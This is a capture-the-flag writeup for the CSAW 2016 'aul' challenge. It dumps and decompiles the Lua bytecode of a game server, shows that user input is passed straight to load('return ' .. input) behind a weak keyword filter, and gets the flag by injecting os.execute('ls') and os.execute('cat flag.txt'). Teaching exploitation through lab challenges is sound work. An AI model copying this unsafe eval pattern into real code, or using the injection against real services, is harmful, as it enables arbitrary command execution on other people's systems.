Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
README.md
aul.lua
aul2.luac

README.md

CSAW CTF 2016 aul (100) Writeup

Wow, this looks like an aul-ful game. I think there is a flag around here somewhere...

nc pwn.chal.csaw.io 8001

This challenge doesn't provide any file to analyze but only a target service to connect to.

After connecting, you'll be presented with something which looks like a game:

let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |

After trying some commands it sends a hint which commands are available:

Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.

As we clearly need some help on this game, let's ask for:

LuaS��
�
xV(w@�����,��,�,��,�,@��,��,���,��,@��,��,�����CA��$@��@C$@�&���
                                                                make_board�populate_board�board_tostring�fall�rotate��crush�
                                                                                                                            rotate_leftreadAll�help�quit��exit�	run_step�game�
writeline��let's play a game
��
  �
   ���K@J��@@��
               AF�@
setmetatable���A���J���@��f�&���size�
             __tostring�board_tostring����"�
                                            .�@�����A@�@�@��$A�b@�������@�RA�,� @���@�F�A���������AB�����A�d������������
@�i�����A������h���@��d����C�BC������
���g���F�C��e��f�&��size�math�
�F@G@������d����F�����@��&�&���math�random�������$/�!K�@�@�@�A��������BN�@���(B�����A���������݁��'����BA�A�@������������$B�������@A�����AA�����&�
�size�����|�� ��table�insert�� |�concat��
�1D�
�G@�@@�����������N�����(�����@���$B�'�����&��size�
                                                  make_board������5=�EN�� @��@����������������_@@���������������������������N�����&��������������OC�MÂ�GC��@��'����@����&���size����΁����N����(B��C�
                                   make_board����Ug�
$G@�@@������������A���A�����@���N�����(A������'�����OA�N������(A��B����G��GB���@���@������@������'�����&�size�
                                                                                                              make_board���a��b��c��d���ik�	F@�@�@����ef&���rotate�mr�
                         F@G@����d��������������@��@���&����io�open��rb�read�*all��close�tx�@@@F�@��d����$���F@A��@ǀ�����d@&��string��subreadAll�
   server.luac���	writeraw��len�{}�@@�&���quit������-F@d���@@��@��������@�����A�@�����@@�@A������������@�����@@�@A������������@�����B�@��������������B��@����������&�
                             �	readline�string��len��exit�find�	function��print�loadreturn ����%�@F@@��d�$�F�@�A�����@����d@�F�A�d����A�@�@��_��@����@BƀB�AB@�$�����������@����@������&�
                                                  �populate_board�
                                                                  make_board�
writeline�board_tostring��
�	run_step�quit�fall��crush�EDidn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.
�Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.

or in hex:

00000000: 4c75 6153 0019 930d 0d0a 1a0d 0a04 0804  LuaS............
00000010: 0808 7856 0000 0000 0000 0000 0000 0028  ..xV...........(
00000020: 7740 0100 0000 0000 0000 0000 0002 021f  w@..............
00000030: 0000 002c 0000 0008 0000 802c 4000 0008  ...,.......,@...
00000040: 0080 802c 8000 0008 0000 812c c000 0008  ...,.......,....
00000050: 0080 812c 0001 0008 0000 822c 4001 0008  ...,.......,@...
00000060: 0080 822c 8001 0008 0000 832c c001 0008  ...,.......,....
00000070: 0080 832c 0002 0008 0000 8408 80c2 842c  ...,...........,
00000080: 4002 0008 0080 852c 8002 0008 0000 862c  @......,.......,
00000090: c002 0008 0080 8606 8043 0041 c003 0024  .........C.A...$
000000a0: 4000 0106 4043 0024 4080 0026 0080 0010  @...@C.$@..&....
000000b0: 0000 0004 0b6d 616b 655f 626f 6172 6404  .....make_board.
000000c0: 0f70 6f70 756c 6174 655f 626f 6172 6404  .populate_board.
000000d0: 0f62 6f61 7264 5f74 6f73 7472 696e 6704  .board_tostring.
000000e0: 0566 616c 6c04 0772 6f74 6174 6504 0663  .fall..rotate..c
000000f0: 7275 7368 040c 726f 7461 7465 5f6c 6566  rush..rotate_lef
00000100: 7404 0872 6561 6441 6c6c 0405 6865 6c70  t..readAll..help
00000110: 0405 7175 6974 0100 0405 6578 6974 0409  ..quit....exit..
00000120: 7275 6e5f 7374 6570 0405 6761 6d65 040d  run_step..game..
00000130: 0a77 7269 7465 6c69 6e65 0413 6c65 7427  .writeline..let'
00000140: 7320 706c 6179 2061 2067 616d 650d 0a01  s play a game...
00000150: 0000 0001 000c 0000 0000 0300 0000 0c00  ................
00000160: 0000 0100 0611 0000 004b 4000 004a 0000  .........K@..J..
00000170: 8086 4040 00c0 0080 000b 4100 0046 c140  ..@@......A..F.@
00000180: 000d 0a41 0181 a440 8001 8100 0100 cf00  ...A...@........
00000190: 0000 ce40 c101 0141 0100 a800 0080 4a00  ...@...A......J.
000001a0: c102 a740 ff7f 6600 0001 2600 8000 0600  ...@..f...&.....
000001b0: 0000 0405 7369 7a65 040d 7365 746d 6574  ....size..setmet
000001c0: 6174 6162 6c65 040b 5f5f 746f 7374 7269  atable..__tostri
000001d0: 6e67 040f 626f 6172 645f 746f 7374 7269  ng..board_tostri
000001e0: 6e67 1300 0000 0000 0000 0013 0100 0000  ng..............
000001f0: 0000 0000 0100 0000 0000 0000 0000 0000  ................
00000200: 0000 0000 0000 0000 0000 000e 0000 0022  ..............."
00000210: 0000 0003 000c 2e00 0000 c700 4000 a200  ............@...
00000220: 0000 1ec0 0080 0641 4000 0781 4002 4001  .......A@...@.@.
00000230: 0001 2441 0001 6240 0000 1e80 0080 0fc1  ..$A..b@........
00000240: 8001 0fc1 4002 5200 4102 2c01 0000 2040  ....@.R.A.,... @
00000250: 8082 1e40 0780 4681 4100 8b01 0002 c1c1  ...@..F.A.......
00000260: 0100 0102 0200 4142 0200 8182 0200 ab41  ......AB.......A
00000270: 0002 6401 0101 1e80 0080 8002 0002 a482  ..d.............
00000280: 8000 0d0a 4002 0569 8100 00ea 81fe 7f41  ....@..i.......A
00000290: c102 008e 01c1 00c1 c102 0068 8101 8040  ...........h...@
000002a0: 0200 0264 8280 0086 0243 0087 4243 05c1  ...d.....C..BC..
000002b0: 0201 00a4 8200 010d 0a80 8204 67c1 fd7f  ............g...
000002c0: 4681 4300 8001 0000 6501 0001 6601 0000  F.C.....e...f...
000002d0: 2600 8000 0f00 0000 0405 7369 7a65 0405  &.........size..
000002e0: 6d61 7468 040b 7261 6e64 6f6d 7365 6564  math..randomseed
000002f0: 1303 0000 0000 0000 0013 0400 0000 0000  ................
00000300: 0000 1300 0000 0000 0000 0004 0769 7061  .............ipa
00000310: 6972 7304 0261 0402 6204 0263 0402 6413  irs..a..b..c..d.
00000320: 0100 0000 0000 0000 0405 6d61 7468 0407  ..........math..
00000330: 7261 6e64 6f6d 0405 6661 6c6c 0100 0000  random..fall....
00000340: 0000 0100 0000 0013 0000 0017 0000 0000  ................
00000350: 0004 0d00 0000 0400 0000 4600 4000 4740  ..........F.@.G@
00000360: c000 8500 8000 c500 8000 8fc0 0001 6480  ..............d.
00000370: 0001 0e80 c000 4600 0001 1fc0 c000 1e40  ......F........@
00000380: fd7f 2600 0001 2600 8000 0400 0000 0405  ..&...&.........
00000390: 6d61 7468 0407 7261 6e64 6f6d 1301 0000  math..random....
000003a0: 0000 0000 0013 0000 0000 0000 0000 0300  ................
000003b0: 0000 0000 0103 0100 0000 0000 0000 0000  ................
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000003d0: 0000 0000 0024 0000 002f 0000 0001 000f  .....$.../......
000003e0: 2100 0000 4b00 0000 8700 4000 c140 0000  !...K.....@..@..
000003f0: 0e81 4001 4181 0000 e880 0480 c1c1 0000  ..@.A...........
00000400: 0142 0000 4e82 4001 8182 0000 2842 0180  .B..N.@.....(B..
00000410: 0003 8003 4103 0100 8f83 0003 8d83 8305  ....A...........
00000420: 8783 0300 dd81 0306 2702 fe7f 0642 4100  ........'....BA.
00000430: 0782 4104 4002 8000 8002 8003 c1c2 0100  ..A.@...........
00000440: 9dc2 0205 2442 8001 e7c0 fa7f c640 4100  ....$B.......@A.
00000450: c700 c201 0001 8000 4141 0200 e500 8001  ........AA......
00000460: e600 0000 2600 8000 0d0a 0000 0004 0573  ....&..........s
00000470: 697a 6513 0000 0000 0000 0000 1301 0000  ize.............
00000480: 0000 0000 0004 027c 0402 2004 0674 6162  .......|.. ..tab
00000490: 6c65 0407 696e 7365 7274 0403 207c 0407  le..insert.. |..
000004a0: 636f 6e63 6174 0402 0d0a 0100 0000 0000  concat..........
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000004c0: 0031 0000 0044 0000 0001 000d 0a10 0000  .1...D..........
000004d0: 0047 0040 0086 4040 00c0 0080 0001 8100  .G.@..@@........
000004e0: 00a4 8080 01ec 0000 0001 c100 004e 01c1  .............N..
000004f0: 0081 0101 0028 8100 8000 0280 0140 0280  .....(.......@..
00000500: 0324 4200 0127 c1fe 7fa6 0000 0126 0080  .$B..'.......&..
00000510: 0005 0000 0004 0573 697a 6504 0b6d 616b  .......size..mak
00000520: 655f 626f 6172 6413 0000 0000 0000 0000  e_board.........
00000530: 1300 0000 0000 0000 0013 0100 0000 0000  ................
00000540: 0000 0100 0000 0000 0100 0000 0035 0000  .............5..
00000550: 003d 0000 0001 0008 1800 0000 4500 0000  .=..........E...
00000560: 4e00 c000 8500 0000 8e00 4001 c140 0000  N.........@..@..
00000570: 0181 0000 a880 0380 8501 0000 8f81 8102  ................
00000580: 8d01 0003 8681 8100 5f40 4003 1e00 0280  ........_@@.....
00000590: 8501 0000 8f81 8100 8d01 0003 c501 0000  ................
000005a0: cfc1 8102 cd01 8003 c6c1 8100 88c0 0103  ................
000005b0: 4e00 c000 a7c0 fb7f 2600 8000 0300 0000  N.......&.......
000005c0: 1301 0000 0000 0000 0013 0000 0000 0000  ................
000005d0: 0000 13ff ffff ffff ffff ff03 0000 0001  ................
000005e0: 0101 0001 0200 0000 0000 0000 0000 0000  ................
000005f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000600: 0000 4600 0000 5300 0000 0100 0e19 0000  ..F...S.........
00000610: 0047 0040 0086 4040 00c0 0080 0001 8100  .G.@..@@........
00000620: 00a4 8080 01c1 8000 000e c1c0 0041 c100  .............A..
00000630: 00e8 0003 80ce c1c0 00ce 8181 0301 8200  ................
00000640: 004e c2c0 0081 c200 0028 4201 800f 4380  .N.......(B...C.
00000650: 050d c301 064f 4300 034d c382 0647 4303  .....OC..M...GC.
00000660: 008a 4003 0627 02fe 7fe7 40fc 7fa6 0000  ..@..'....@.....
00000670: 0126 0080 0004 0000 0004 0573 697a 6504  .&.........size.
00000680: 0b6d 616b 655f 626f 6172 6413 0000 0000  .make_board.....
00000690: 0000 0000 1301 0000 0000 0000 0001 0000  ................
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000006b0: 0000 0000 5500 0000 6700 0000 0100 0d0a  ....U...g.......
000006c0: 2400 0000 4700 4000 8640 4000 c000 8000  $...G.@..@@.....
000006d0: 0181 0000 a480 8001 cb00 0002 01c1 0000  ................
000006e0: 4101 0100 8141 0100 c181 0100 eb40 0002  A....A.......@..
000006f0: 0181 0000 4ec1 c100 81c1 0100 2841 0080  ....N.......(A..
00000700: 07c2 0100 8a00 8203 2701 ff7f 0001 8000  ........'.......
00000710: 4f41 8000 4ec1 c102 81c1 0100 2841 0280  OA..N.......(A..
00000720: 0e42 8003 0702 0200 47c2 0100 4742 8201  .B......G...GB..
00000730: 1f40 0204 1e40 0080 8a80 c003 1e40 0080  .@...@.......@..
00000740: 07c2 0100 8a00 8203 2701 fd7f a600 0001  ........'.......
00000750: 2600 8000 0800 0000 0405 7369 7a65 040b  &.........size..
00000760: 6d61 6b65 5f62 6f61 7264 1300 0000 0000  make_board......
00000770: 0000 0004 0261 0402 6204 0263 0402 6413  .....a..b..c..d.
00000780: 0100 0000 0000 0000 0100 0000 0000 0000  ................
00000790: 0000 0000 0000 0000 0000 0000 0000 0069  ...............i
000007a0: 0000 006b 0000 0001 0005 0900 0000 4600  ...k..........F.
000007b0: 4000 8600 4000 c600 4000 0001 0000 e400  @...@...@.......
000007c0: 0001 a400 0000 6500 0000 6600 0000 2600  ......e...f...&.
000007d0: 8000 0100 0000 0407 726f 7461 7465 0100  ........rotate..
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000007f0: 0000 0000 006d 0000 0072 0000 0001 0005  .....m...r......
00000800: 0c00 0000 4600 4000 4740 c000 8000 0000  ....F.@.G@......
00000810: c180 0000 6480 8001 8cc0 c000 0101 0100  ....d...........
00000820: a480 8001 cc40 c100 e440 0001 a600 0001  .....@...@......
00000830: 2600 8000 0600 0000 0403 696f 0405 6f70  &.........io..op
00000840: 656e 0403 7262 0405 7265 6164 0405 2a61  en..rb..read..*a
00000850: 6c6c 0406 636c 6f73 6501 0000 0000 0000  ll..close.......
00000860: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000870: 7400 0000 7800 0000 0000 050f 0000 0006  t...x...........
00000880: 0040 0007 4040 0046 8040 0081 c000 0064  .@..@@.F.@.....d
00000890: 8000 0181 0001 0024 8080 0146 4041 0080  .......$...F@A..
000008a0: 0000 00c6 0040 00c7 80c1 0100 0100 00e4  .....@..........
000008b0: 0000 0164 4000 0026 0080 0007 0000 0004  ...d@..&........
000008c0: 0773 7472 696e 6704 0473 7562 0408 7265  .string..sub..re
000008d0: 6164 416c 6c04 0c73 6572 7665 722e 6c75  adAll..server.lu
000008e0: 6163 1302 0000 0000 0000 0004 0977 7269  ac...........wri
000008f0: 7465 7261 7704 046c 656e 0100 0000 0000  teraw..len......
00000900: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000910: 007b 0000 007d 0000 0000 0002 0200 0000  .{...}..........
00000920: 0840 4080 2600 8000 0200 0000 0405 7175  .@@.&.........qu
00000930: 6974 0101 0100 0000 0000 0000 0000 0000  it..............
00000940: 0000 0000 0000 0000 0000 007f 0000 0097  ................
00000950: 0000 0001 0005 2d00 0000 4600 4000 6480  ......-...F.@.d.
00000960: 8000 8640 4000 8780 4001 c000 8000 a480  ...@@...@.......
00000970: 0001 1fc0 4001 1ec0 0080 8600 4100 a440  ....@.......A..@
00000980: 8000 8400 0000 a600 0001 8640 4000 8740  ...........@@..@
00000990: 4101 c000 8000 0181 0100 a480 8001 a200  A...............
000009a0: 0000 1e40 0080 8400 0000 a600 0001 8640  ...@...........@
000009b0: 4000 8740 4101 c000 8000 01c1 0100 a480  @..@A...........
000009c0: 8001 a200 0000 1e40 0080 8400 0000 a600  .......@........
000009d0: 0001 8600 4200 c140 0200 0001 8000 dd00  ....B..@........
000009e0: 8101 a480 0001 a480 8000 1f80 4201 1e40  ............B..@
000009f0: 0080 c400 0000 e600 0001 c000 0001 0001  ................
00000a00: 0000 e500 0001 e600 0000 2600 8000 0b00  ..........&.....
00000a10: 0000 0409 7265 6164 6c69 6e65 0407 7374  ....readline..st
00000a20: 7269 6e67 0404 6c65 6e13 0000 0000 0000  ring..len.......
00000a30: 0000 0405 6578 6974 0405 6669 6e64 0409  ....exit..find..
00000a40: 6675 6e63 7469 6f6e 0406 7072 696e 7404  function..print.
00000a50: 056c 6f61 6404 0872 6574 7572 6e20 0001  .load..return ..
00000a60: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000a70: 0000 0000 0000 9900 0000 ae00 0000 0000  ................
00000a80: 0625 0000 0006 0040 0046 4040 0081 8000  .%.....@.F@@....
00000a90: 0064 0000 0124 8000 0046 c040 0086 0041  .d...$...F.@...A
00000aa0: 00c0 0000 00a4 8000 01c1 4001 009d c000  ..........@.....
00000ab0: 0164 4000 0146 8041 0080 0000 0064 8000  .d@..F.A.....d..
00000ac0: 0186 c041 00a2 4000 001e 4004 805f 00c2  ...A..@...@.._..
00000ad0: 001e 4002 8000 0080 0086 4042 00c6 8042  ..@.......@B...B
00000ae0: 0006 4142 0040 0100 0024 0100 01e4 0000  ..AB.@...$......
00000af0: 00a4 8000 0000 0000 011e 8000 8086 c040  ...............@
00000b00: 00c1 c002 00a4 4000 0183 0000 00a2 0000  ......@.........
00000b10: 001e 00f8 7f26 0080 000c 0000 0004 0f70  .....&.........p
00000b20: 6f70 756c 6174 655f 626f 6172 6404 0b6d  opulate_board..m
00000b30: 616b 655f 626f 6172 6413 0800 0000 0000  ake_board.......
00000b40: 0000 040d 0a77 7269 7465 6c69 6e65 040f  .....writeline..
00000b50: 626f 6172 645f 746f 7374 7269 6e67 0402  board_tostring..
00000b60: 0d0a 0409 7275 6e5f 7374 6570 0405 7175  ....run_step..qu
00000b70: 6974 0004 0566 616c 6c04 0663 7275 7368  it...fall..crush
00000b80: 1445 4469 646e 2774 2075 6e64 6572 7374  .EDidn't underst
00000b90: 616e 642e 2054 7970 6520 2772 6f74 6174  and. Type 'rotat
00000ba0: 6527 2c20 2772 6f74 6174 655f 6c65 6674  e', 'rotate_left
00000bb0: 272c 2027 6578 6974 272c 206f 7220 2768  ', 'exit', or 'h
00000bc0: 656c 7027 2e0d 0a01 0000 0000 0000 0000  elp'............
00000bd0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000be0: 0000 0000 0000 0000 00                   .........

This gibberish seem to be some lua compiled bytecode. Trying to decompile it with unluac fails as it complains about a missing lua header. After looking into the source code of unluac, we'll see how a header should look like.

After prepending a byte with the value 0x1b we are able to pass the magic check. But the decompiling still fails with errors. If you look carefully, you'll notice that new lines (\n, 0a) never occur alone, but instead as \r\n (0d 0a). So let's try to convert them. This time we are lucky and are able to decompile the bytecode:

function make_board(A0_0)
  local L1_1
  L1_1 = {}
  L1_1.size = A0_0
  setmetatable(L1_1, {
    __tostring = board_tostring
  })
  for _FORV_5_ = 0, A0_0 * A0_0 - 1 do
    L1_1[_FORV_5_] = 0
  end
  return L1_1
end
function populate_board(A0_2, A1_3, A2_4)
  local L3_5, L4_6
  L3_5 = A0_2.size
  if A2_4 then
    L4_6 = math
    L4_6 = L4_6.randomseed
    L4_6(A2_4)
  end
  if not A1_3 then
    L4_6 = L3_5 * L3_5
    L4_6 = L4_6 * 3
    A1_3 = L4_6 / 4
  end
  function L4_6()
    repeat
    until A0_2[math.random(L3_5 * L3_5) - 1] == 0
    return math.random(L3_5 * L3_5) - 1
  end
  if A1_3 > 0 then
    for _FORV_8_, _FORV_9_ in ipairs({
      "a",
      "b",
      "c",
      "d"
    }) do
      A0_2[L4_6()] = _FORV_9_
    end
    for _FORV_8_ = 1, A1_3 - 4 do
      A0_2[L4_6()] = math.random(4)
    end
    return fall(A0_2)
  end
end
function board_tostring(A0_7)
  local L1_8, L2_9, L3_10, L4_11, L5_12, L6_13, L7_14
  L1_8 = {}
  L2_9 = A0_7.size
  for L6_13 = 0, L2_9 - 1 do
    L7_14 = "|"
    for _FORV_11_ = 0, L2_9 - 1 do
      L7_14 = L7_14 .. " " .. A0_7[_FORV_11_ + L6_13 * L2_9]
    end
    _FOR_.insert(L1_8, L7_14 .. " |")
  end
  return L3_10(L4_11, L5_12)
end
function fall(A0_15)
  local L1_16, L2_17, L3_18, L4_19, L5_20, L6_21, L7_22
  L1_16 = A0_15.size
  L2_17 = make_board
  L3_18 = L1_16
  L2_17 = L2_17(L3_18, L4_19)
  function L3_18(A0_23)
    local L1_24, L3_25, L4_26, L5_27, L6_28, L7_29
    L1_24 = L1_16
    L1_24 = L1_24 - 1
    for L6_28 = L3_25 - 1, 0, -1 do
      L7_29 = L1_16
      L7_29 = L6_28 * L7_29
      L7_29 = L7_29 + A0_23
      L7_29 = A0_15[L7_29]
      if L7_29 ~= 0 then
        L7_29 = L1_16
        L7_29 = L1_24 * L7_29
        L7_29 = L7_29 + A0_23
        L2_17[L7_29] = A0_15[L6_28 * L1_16 + A0_23]
        L1_24 = L1_24 - 1
      end
    end
  end
  for L7_22 = 0, L1_16 - 1 do
    L3_18(L7_22)
  end
  return L2_17
end
function rotate(A0_30)
  local L1_31
  L1_31 = A0_30.size
  for _FORV_6_ = 0, L1_31 - 1 do
    for _FORV_11_ = 0, L1_31 - 1 do
      make_board(L1_31, 0)[_FORV_11_ * L1_31 + (L1_31 - 1 - _FORV_6_)] = A0_30[_FORV_6_ * L1_31 + _FORV_11_]
    end
  end
  return (make_board(L1_31, 0))
end
function crush(A0_32)
  local L1_33
  L1_33 = A0_32.size
  for _FORV_7_ = 0, L1_33 - 1 do
    make_board(L1_33, 0)[_FORV_7_] = A0_32[_FORV_7_]
  end
  for _FORV_7_ = L1_33, L1_33 * L1_33 - 1 do
    if A0_32[_FORV_7_ - L1_33] == ({
      "a",
      "b",
      "c",
      "d"
    })[A0_32[_FORV_7_]] then
      make_board(L1_33, 0)[_FORV_7_] = 0
    else
      make_board(L1_33, 0)[_FORV_7_] = A0_32[_FORV_7_]
    end
  end
  return (make_board(L1_33, 0))
end
function rotate_left(A0_34)
  local L1_35, L2_36
  L1_35 = rotate
  L2_36 = rotate
  L2_36 = L2_36(rotate(A0_34))
  return L1_35(L2_36, L2_36(rotate(A0_34)))
end
function readAll(A0_37)
  io.open(A0_37, "rb"):close()
  return (io.open(A0_37, "rb"):read("*all"))
end
function help()
  local L0_38
  L0_38 = string
  L0_38 = L0_38.sub
  L0_38 = L0_38(readAll("server.luac"), 2)
  writeraw(L0_38, string.len(L0_38))
end
quit = false
function exit()
  local L0_39, L1_40
  quit = true
end
function run_step(A0_41)
  local L1_42, L2_43
  L1_42 = readline
  L1_42 = L1_42()
  L2_43 = string
  L2_43 = L2_43.len
  L2_43 = L2_43(L1_42)
  if L2_43 == 0 then
    L2_43 = exit
    L2_43()
    L2_43 = nil
    return L2_43
  end
  L2_43 = string
  L2_43 = L2_43.find
  L2_43 = L2_43(L1_42, "function")
  if L2_43 then
    L2_43 = nil
    return L2_43
  end
  L2_43 = string
  L2_43 = L2_43.find
  L2_43 = L2_43(L1_42, "print")
  if L2_43 then
    L2_43 = nil
    return L2_43
  end
  L2_43 = load
  L2_43 = L2_43("return " .. L1_42)
  L2_43 = L2_43()
  if L2_43 == nil then
    return nil
  end
  return L2_43(A0_41)
end
function game()
  local L0_44
  L0_44 = populate_board
  L0_44 = L0_44(make_board(8))
  repeat
    writeline(board_tostring(L0_44) .. "\n")
    if not quit then
      if run_step(L0_44) ~= nil then
        L0_44 = run_step(L0_44)
        L0_44 = fall(crush(fall(L0_44)))
      else
        writeline("Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.\n")
      end
    end
  until false
end
writeline("let's play a game\n")
game()

The interesting function in this case is the run_step one. As you may notice, there is no comparisons for the available commands (help, rotate, rotate_left, exit), but instead there are functions available which are named liked this. Additionally, the run_step function checks our input if it contains the strings function or print. If you look carefully at the line L2_43 = load and the follow ups, you may see that we can reduce them to the following:

load("return " .. L1_42)()

This means that our input (stored in the variable L1_42) is placed after a return statement and interpreted. This would create an anonymous function which is afterwards called to return a reference to the function which is named after the entered command.

Our goal is to inject our own code to gain the flag (typically stored in a file near the executable). This means that we can try to execute system commands (os.execute). Guess what, it works :)

os.execute("ls")

to get the filename of the flag and

os.execute("cat flag.txt")

to get the flag.